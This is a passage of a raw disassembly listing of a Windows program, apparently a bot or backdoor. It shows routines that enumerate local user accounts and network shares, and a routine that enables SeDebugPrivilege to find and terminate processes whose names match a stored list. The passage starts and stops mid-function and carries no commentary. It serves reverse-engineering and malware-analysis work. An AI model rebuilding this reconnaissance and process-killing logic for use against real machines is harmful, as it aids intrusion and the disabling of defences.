call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+Dest]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+Dest]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+Dest]
push offset aLastLogonD ; "Last Logon: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+Dest]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+Dest]
push offset aLogonServerS ; "Logon Server: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+Dest]
push offset aWorkstationsS ; "Workstations: %S"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+Dest]
push offset aCountryCodeD ; "Country Code: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+Dest]
push offset aUserSLanguageD ; "User's Language: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+Dest]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+Dest]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_40123B
add esp, 20h
pop edi
pop ebx
jmp short loc_41BD45
; ---------------------------------------------------------------------------
loc_41BD19: ; CODE XREF: sub_41B98C+35�j
push eax
lea eax, [ebp+Dest]
push offset asc_4382AC ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
push [ebp+arg_10] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_8] ; int
call sub_40123B
add esp, 20h
loc_41BD45: ; CODE XREF: sub_41B98C+38B�j
cmp [ebp+var_4], 0
jz short loc_41BD54
push [ebp+var_4]
call dword_444140
loc_41BD54: ; CODE XREF: sub_41B98C+40�j
; sub_41B98C+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_41B98C endp
; =============== S U B R O U T I N E =======================================
sub_41BD5A proc near ; CODE XREF: sub_41BE8A+9E�p
; sub_41BFBE:loc_41BFFE�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_41BE08
jz loc_41BE01
cmp eax, 7Bh
ja short loc_41BDCD
jz short loc_41BDC3
cmp eax, 5
jz short loc_41BDB9
cmp eax, 8
jz short loc_41BDAF
cmp eax, 32h
jz short loc_41BDA5
cmp eax, 35h
jz short loc_41BD9B
cmp eax, 57h
jnz loc_41BE57
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BD9B: ; CODE XREF: sub_41BD5A+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDA5: ; CODE XREF: sub_41BD5A+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDAF: ; CODE XREF: sub_41BD5A+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDB9: ; CODE XREF: sub_41BD5A+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDC3: ; CODE XREF: sub_41BD5A+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BD5A+16�j
sub eax, 7Ch
jz short loc_41BDFA
sub eax, 7C8h
jz short loc_41BDF3
dec eax
jz short loc_41BDE9
dec eax
jnz short loc_41BE57
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDE9: ; CODE XREF: sub_41BD5A+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDF3: ; CODE XREF: sub_41BD5A+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDFA: ; CODE XREF: sub_41BD5A+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE01: ; CODE XREF: sub_41BD5A+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE08: ; CODE XREF: sub_41BD5A+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41BE41
jz short loc_41BE3A
sub eax, 8ADh
jz short loc_41BE6C
dec eax
dec eax
jz short loc_41BE33
dec eax
jz short loc_41BE2C
dec eax
dec eax
jnz short loc_41BE57
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE2C: ; CODE XREF: sub_41BD5A+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE33: ; CODE XREF: sub_41BD5A+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE3A: ; CODE XREF: sub_41BD5A+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE41: ; CODE XREF: sub_41BD5A+B5�j
sub eax, 8CAh
jz short loc_41BE73
sub eax, 17h
jz short loc_41BE6C
sub eax, 25h
jz short loc_41BE65
sub eax, 29h
jz short loc_41BE5E
loc_41BE57: ; CODE XREF: sub_41BD5A+31�j
; sub_41BD5A+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE5E: ; CODE XREF: sub_41BD5A+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE65: ; CODE XREF: sub_41BD5A+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE6C: ; CODE XREF: sub_41BD5A+BE�j
; sub_41BD5A+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE73: ; CODE XREF: sub_41BD5A+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_41BE78: ; CODE XREF: sub_41BD5A+3C�j
; sub_41BD5A+46�j ...
push offset byte_4E1F10 ; Dest
call _sprintf
pop ecx
pop ecx
mov eax, offset byte_4E1F10
retn
sub_41BD5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41BE8A(char *Source)
sub_41BE8A proc near ; CODE XREF: sub_40274D+44CA�p
Str = word ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h ; MaxCount
push [ebp+Source] ; Source
lea eax, [ebp+Str]
push eax ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_42B05C ; GetComputerNameA
push esi ; MaxCount
lea eax, [ebp+var_10C]
push eax ; Source
lea eax, [ebp+var_31C]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+Str]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_444114
test eax, eax
jnz short loc_41BF1A
push offset asc_438744 ; "-"
mov esi, offset byte_4E1F70
push esi ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_41BF41
; ---------------------------------------------------------------------------
loc_41BF1A: ; CODE XREF: sub_41BE8A+7A�j
lea ecx, [ebp+Str]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_41BD5A
push eax
push offset asc_438718 ; "-"
mov esi, offset byte_4E1F70
push esi ; Dest
call _sprintf
add esp, 14h
loc_41BF41: ; CODE XREF: sub_41BE8A+8E�j
mov eax, esi
pop esi
leave
retn
sub_41BE8A endp
; =============== S U B R O U T I N E =======================================
sub_41BF46 proc near ; CODE XREF: sub_40274D:loc_406A33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_41BF9C
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_443400[esi]
push edi
push eax
call sub_41B465
add esp, 14h
test eax, eax
jnz short loc_41BF8E
push edi
push off_4433FC[esi]
push offset asc_4387BC ; "-"
loc_41BF7E: ; CODE XREF: sub_41BF46+54�j
mov esi, offset byte_4E2170
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_41BFB9
; ---------------------------------------------------------------------------
loc_41BF8E: ; CODE XREF: sub_41BF46+2A�j
call sub_41B507
push eax
push edi
push offset unk_438790
jmp short loc_41BF7E
; ---------------------------------------------------------------------------
loc_41BF9C: ; CODE XREF: sub_41BF46+C�j
lea eax, [eax+eax*2]
push off_4433F8[eax*4]
mov esi, offset byte_4E2170
push offset asc_43876C ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_41BFB9: ; CODE XREF: sub_41BF46+46�j
pop edi
mov eax, esi
pop esi
retn
sub_41BF46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41BFBE(int,char *Str,int)
sub_41BFBE proc near ; CODE XREF: sub_40274D:loc_406B1D�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Str]
test edi, edi
jz loc_41C056
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41BFE7
dec eax
jnz short loc_41C036
push edi
push 0
call sub_41B8EE
pop ecx
pop ecx
jmp short loc_41C032
; ---------------------------------------------------------------------------
loc_41BFE7: ; CODE XREF: sub_41BFBE+18�j
cmp [ebp+arg_8], 0
jnz short loc_41C024
push 24h ; Val
push edi ; Str
call _strchr
test eax, eax
pop ecx
pop ecx
jnz short loc_41C024
push 57h
pop eax
loc_41BFFE: ; CODE XREF: sub_41BFBE+76�j
call sub_41BD5A
push eax
push edi
lea eax, [esi+esi*2]
push off_4433F8[eax*4]
mov esi, offset byte_4E2370
push offset asc_438818 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_41C076
; ---------------------------------------------------------------------------
loc_41C024: ; CODE XREF: sub_41BFBE+2D�j
; sub_41BFBE+3B�j
push [ebp+arg_8] ; int
push edi ; Str
push 0 ; int
call sub_41B883
add esp, 0Ch
loc_41C032: ; CODE XREF: sub_41BFBE+27�j
test eax, eax
jnz short loc_41BFFE
loc_41C036: ; CODE XREF: sub_41BFBE+1B�j
push edi
lea eax, [esi+esi*2]
push off_4433FC[eax*4]
mov esi, offset byte_4E2370
push offset asc_4387FC ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_41C076
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: sub_41BFBE+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_4433F8[eax*4]
mov esi, offset byte_4E2370
push offset asc_4387D8 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_41C076: ; CODE XREF: sub_41BFBE+64�j
; sub_41BFBE+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_41BFBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C07C(int,char *Str,int,int)
sub_41C07C proc near ; CODE XREF: sub_40274D+43F9�p
Dest = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_41B7C1
xor esi, esi
push esi ; int
push [ebp+arg_8] ; int
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+Str] ; Str
mov [ebp+var_4], esi
push [ebp+arg_0] ; int
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_40123B
add esp, 18h
loc_41C0B5: ; CODE XREF: sub_41C07C+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_44420C
mov ebx, eax
cmp ebx, esi
jz short loc_41C116
cmp ebx, 0EAh
jz short loc_41C116
push ebx
call sub_41BD5A
push eax
lea eax, [ebp+Dest]
push offset asc_438864 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 24h
jmp short loc_41C183
; ---------------------------------------------------------------------------
loc_41C116: ; CODE XREF: sub_41C07C+5D�j
; sub_41C07C+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_41C17A
mov esi, [ebp+var_8]
add esi, 14h
loc_41C124: ; CODE XREF: sub_41C07C+FA�j
push dword ptr [esi+10h]
call dword_444204 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41C13B
mov eax, offset aNo ; "No"
loc_41C13B: ; CODE XREF: sub_41C07C+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+Dest]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax ; Dest
call _sprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_41C124
xor esi, esi
loc_41C17A: ; CODE XREF: sub_41C07C+A0�j
push [ebp+var_8]
call dword_444140
loc_41C183: ; CODE XREF: sub_41C07C+98�j
cmp ebx, 0EAh
jz loc_41C0B5
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41C07C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C19B(int,int,int,int,char *Str,int)
sub_41C19B proc near ; CODE XREF: sub_40274D:loc_406BAB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_41C23E
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_41C1DD
dec eax
jz short loc_41C1D2
dec eax
jnz short loc_41C1F8
push [ebp+arg_14] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push ebx ; int
push edi ; int
call sub_41B98C
add esp, 14h
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1D2: ; CODE XREF: sub_41C19B+1D�j
push ebx
push edi
call sub_41B96B
pop ecx
pop ecx
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1DD: ; CODE XREF: sub_41C19B+1A�j
cmp [ebp+arg_8], edi
jz short loc_41C1F1
push [ebp+arg_8]
push ebx
push edi
call sub_41B911
add esp, 0Ch
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1F1: ; CODE XREF: sub_41C19B+45�j
push 57h
pop eax
loc_41C1F4: ; CODE XREF: sub_41C19B+35�j
; sub_41C19B+40�j ...
cmp eax, edi
jnz short loc_41C218
loc_41C1F8: ; CODE XREF: sub_41C19B+20�j
push ebx
lea eax, [esi+esi*2]
push off_4433FC[eax*4]
mov esi, offset byte_4E2570
push offset asc_43891C ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_41C25E
; ---------------------------------------------------------------------------
loc_41C218: ; CODE XREF: sub_41C19B+5B�j
call sub_41BD5A
push eax
push ebx
lea eax, [esi+esi*2]
push off_4433F8[eax*4]
mov esi, offset byte_4E2570
push offset asc_4388EC ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_41C25E
; ---------------------------------------------------------------------------
loc_41C23E: ; CODE XREF: sub_41C19B+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_4433F8[eax*4]
mov esi, offset byte_4E2570
push offset asc_4388C4 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_41C25E: ; CODE XREF: sub_41C19B+7B�j
; sub_41C19B+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_41C19B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C265(int,char *Str,int,int)
sub_41C265 proc near ; CODE XREF: sub_40274D+4487�p
Dest = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_41B7C1
push esi ; int
push [ebp+arg_8] ; int
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+Str] ; Str
mov [ebp+var_8], esi
push [ebp+arg_0] ; int
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_40123B
add esp, 18h
push ebx
loc_41C2A4: ; CODE XREF: sub_41C265+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_4440E0
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_41C303
cmp eax, 0EAh
jz short loc_41C303
push eax
call sub_41BD5A
push eax
lea eax, [ebp+Dest]
push offset asc_438988 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 24h
jmp short loc_41C374
; ---------------------------------------------------------------------------
loc_41C303: ; CODE XREF: sub_41C265+62�j
; sub_41C265+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41C387
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_41C374
loc_41C311: ; CODE XREF: sub_41C265+E7�j
cmp edi, esi
lea eax, [ebp+Dest]
jz short loc_41C350
push dword ptr [edi]
push offset aS_5 ; " %S"
push eax ; Dest
call _sprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_41C311
jmp short loc_41C374
; ---------------------------------------------------------------------------
loc_41C350: ; CODE XREF: sub_41C265+B4�j
push offset asc_438954 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 1Ch
loc_41C374: ; CODE XREF: sub_41C265+9C�j
; sub_41C265+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41C387
push edi
call dword_444140
xor edi, edi
mov [ebp+var_4], edi
loc_41C387: ; CODE XREF: sub_41C265+A3�j
; sub_41C265+114�j
cmp [ebp+var_10], 0EAh
jz loc_41C2A4
cmp edi, esi
pop ebx
jz short loc_41C3A0
push edi
call dword_444140
loc_41C3A0: ; CODE XREF: sub_41C265+132�j
push [ebp+var_C]
lea eax, [ebp+Dest]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax ; Dest
call _sprintf
push esi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_41C265 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3D9 proc near ; CODE XREF: sub_419FFD+45�p
; sub_419FFD+165�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_42B09C ; GetCurrentProcess
push eax
call dword_444244 ; OpenProcessToken
test eax, eax
jnz short loc_41C3F8
leave
retn
; ---------------------------------------------------------------------------
loc_41C3F8: ; CODE XREF: sub_41C3D9+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_444228 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41C436
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_41C41F
or [ebp+var_8], 2
jmp short loc_41C423
; ---------------------------------------------------------------------------
loc_41C41F: ; CODE XREF: sub_41C3D9+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41C423: ; CODE XREF: sub_41C3D9+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_444170 ; AdjustTokenPrivileges
mov esi, eax
loc_41C436: ; CODE XREF: sub_41C3D9+32�j
push [ebp+var_4]
call ds:dword_42B004 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_41C3D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=60h
; int __cdecl sub_41C444(int,char *Str,int,char *Str2,int,int)
sub_41C444 proc near ; CODE XREF: sub_40274D+7533�p
; sub_41C66C+67�p ...
Dest = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
Str1 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
lea ebp, [esp-60h]
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_4440F0, ebx
pop ecx
lea edi, [ebp+60h+var_128]
mov [ebp+60h+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+60h+var_34C]
mov [ebp+60h+var_350], ebx
rep stosd
jz loc_41C635
cmp dword_444154, ebx
jz loc_41C635
cmp dword_4440A4, ebx
jz loc_41C635
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4440F0 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+60h+var_4], edi
jz loc_41C628
lea eax, [ebp+60h+var_12C]
push eax
push edi
mov [ebp+60h+var_12C], 128h
call dword_444154 ; Process32First
test eax, eax
mov esi, ds:dword_42B004
jz loc_41C623
lea eax, [ebp+60h+var_12C]
push eax
push edi
call dword_4440A4 ; Process32Next
test eax, eax
jz loc_41C623
mov ebx, ds:dword_42B040
loc_41C505: ; CODE XREF: sub_41C444+1D7�j
xor edi, edi
cmp [ebp+60h+arg_10], edi
jz short loc_41C562
loc_41C50C: ; CODE XREF: sub_41C444+E5�j
push off_443458[edi]
lea eax, [ebp+60h+Str1]
push eax
call ds:dword_42B124 ; lstrcmpi
test eax, eax
jz short loc_41C530
add edi, 4
cmp edi, 60h
jb short loc_41C50C
jmp loc_41C609
; ---------------------------------------------------------------------------
loc_41C530: ; CODE XREF: sub_41C444+DD�j
push [ebp+60h+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_41C609
push 0
push edi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz loc_41C609
loc_41C55A: ; CODE XREF: sub_41C444+1AB�j
push edi
call esi ; CloseHandle
jmp loc_41C609
; ---------------------------------------------------------------------------
loc_41C562: ; CODE XREF: sub_41C444+C6�j
cmp [ebp+60h+Str2], edi
jnz loc_41C5F4
cmp [ebp+60h+Str], edi
jz loc_41C609
push [ebp+60h+var_124]
push 8
call dword_4440F0 ; CreateToolhelp32Snapshot
cmp [ebp+60h+arg_14], 0
mov edi, eax
mov [ebp+60h+var_350], 224h
jz short loc_41C5B4
lea eax, [ebp+60h+var_350]
push eax
push edi
call dword_444118 ; Module32First
test eax, eax
push [ebp+60h+var_124]
jz short loc_41C5BA
lea eax, [ebp+60h+var_230]
jmp short loc_41C5C0
; ---------------------------------------------------------------------------
loc_41C5B4: ; CODE XREF: sub_41C444+14E�j
push [ebp+60h+var_124]
loc_41C5BA: ; CODE XREF: sub_41C444+166�j
lea eax, [ebp+60h+Str1]
loc_41C5C0: ; CODE XREF: sub_41C444+16E�j
push eax
lea eax, [ebp+60h+Dest]
push offset aSD_0 ; " %s (%d)"
push eax ; Dest
call _sprintf
add esp, 10h
push 1 ; int
push [ebp+60h+arg_8] ; int
lea eax, [ebp+60h+Dest]
push eax ; int
push [ebp+60h+Str] ; Str
push [ebp+60h+arg_0] ; int
call sub_40123B
add esp, 14h
jmp loc_41C55A
; ---------------------------------------------------------------------------
loc_41C5F4: ; CODE XREF: sub_41C444+121�j
push [ebp+60h+Str2] ; Str2
lea eax, [ebp+60h+Str1]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_41C63F
loc_41C609: ; CODE XREF: sub_41C444+E7�j
; sub_41C444+FF�j ...
lea eax, [ebp+60h+var_12C]
push eax
push [ebp+60h+var_4]
call dword_4440A4 ; Process32Next
test eax, eax
jnz loc_41C505
xor ebx, ebx
loc_41C623: ; CODE XREF: sub_41C444+9F�j
; sub_41C444+B5�j
push [ebp+60h+var_4]
call esi ; CloseHandle
loc_41C628: ; CODE XREF: sub_41C444+79�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
pop ecx
pop ecx
loc_41C635: ; CODE XREF: sub_41C444+3C�j
; sub_41C444+48�j ...
xor eax, eax
loc_41C637: ; CODE XREF: sub_41C444+226�j
pop edi
pop esi
pop ebx
add ebp, 60h
leave
retn
; ---------------------------------------------------------------------------
loc_41C63F: ; CODE XREF: sub_41C444+1C3�j
push [ebp+60h+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+60h+var_4]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz short loc_41C667
push edi
call esi ; CloseHandle
jmp short loc_41C635
; ---------------------------------------------------------------------------
loc_41C667: ; CODE XREF: sub_41C444+21C�j
xor eax, eax
inc eax
jmp short loc_41C637
sub_41C444 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41C66C proc near ; DATA XREF: sub_40274D+24CA�o
Dest = byte ptr -298h
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
